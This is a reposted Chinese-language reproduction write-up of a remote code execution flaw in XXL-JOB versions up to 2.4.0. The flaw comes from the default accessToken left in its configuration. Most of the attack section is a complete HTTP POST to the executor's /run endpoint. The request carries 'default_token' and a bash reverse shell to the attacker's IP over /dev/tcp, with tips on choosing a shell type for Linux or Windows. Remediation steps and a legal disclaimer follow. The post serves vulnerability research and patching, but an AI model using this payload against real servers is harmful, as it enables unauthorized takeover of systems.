xxl-job 默认accessToken远程代码执行漏洞复现

admin 2024年2月15日18:46:26评论12 views字数 1542阅读5分8秒阅读模式

xxl-job 默认accessToken远程代码执行漏洞复现

一、漏洞描述

XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。默认配置下,调度通讯accessToken不是随机生成的,是使用application.properties配置文件中的默认值。在使用中如果没有修改默认值,攻击者可利用默认绕过认证,从而调用executor,导致执行任意代码。

二、影响范围

<= 2.4.0

三、复现环境

被攻击机:虚拟机 ubuntu  18 x64  ip:192.168.43.23

攻击机器:【 win10 x64 ip:192.168.43.129】

步骤:

第一步、被攻击机器搭建 xxl-job

docker 搭建

xxl-job 默认accessToken远程代码执行漏洞复现

xxl-job 默认accessToken远程代码执行漏洞复现

第二步、攻击机发送恶意数据包
poc如下:反弹shell
POST /run HTTP/1.1Host: 192.168.43.23:9999Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36XXL-JOB-ACCESS-TOKEN: default_tokenConnection: closeContent-Type: application/jsonContent-Length: 397{  "jobId": 1,  "executorHandler": "demoJobHandler",  "executorParams": "demoJobHandler",  "executorBlockStrategy": "SERIAL_EXECUTION",  "executorTimeout": 0,  "logId": 1,  "logDateTime": 1586629003729,  "glueType": "GLUE_SHELL",  "glueSource": "bash -i >& /dev/tcp/192.168.43.129/12345 0>&1",  "glueUpdatetime": 1586699003758,  "broadcastIndex": 0,  "broadcastTotal": 0}
"glueType",基于Java的groovy、python、php、nodejs等,调用任意一个都能rce。
建议:linux 用  "glueType": "GLUE_SHELL",

windows 用"glueType": "GLUE_POWERSHELL",

本地监听12345端口

xxl-job 默认accessToken远程代码执行漏洞复现

xxl-job 默认accessToken远程代码执行漏洞复现

burpsuit发送poc后,成功接收到shell

xxl-job 默认accessToken远程代码执行漏洞复现

xxl-job 默认accessToken远程代码执行漏洞复现

四、测试反弹shell录屏

五、修复方案1、修改调度中心和执行器配置项 xxl.job.accessToken 的默认值,注意要设置相同的值:
https://www.xuxueli.com/xxl-job/#5.10%20%E8%AE%BF%E9%97%AE%E4%BB%A4%E7%89%8C%EF%BC%88AccessToken%EF%BC%89

2、临时修复方案:
1.安全设备类设备对相关资产进行防护;
2.关闭对外开放的9999端口。

本文仅供参考学习,请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。本文所提供的技术信息或代码工具来自于互联网,仅供于学习。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者本人负责。使用者应该遵守法律法规

原文始发于微信公众号(三年2班周星一):xxl-job 默认accessToken远程代码执行漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日18:46:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   xxl-job 默认accessToken远程代码执行漏洞复现http://cn-sec.com/archives/2392559.html

发表评论

匿名网友 填写信息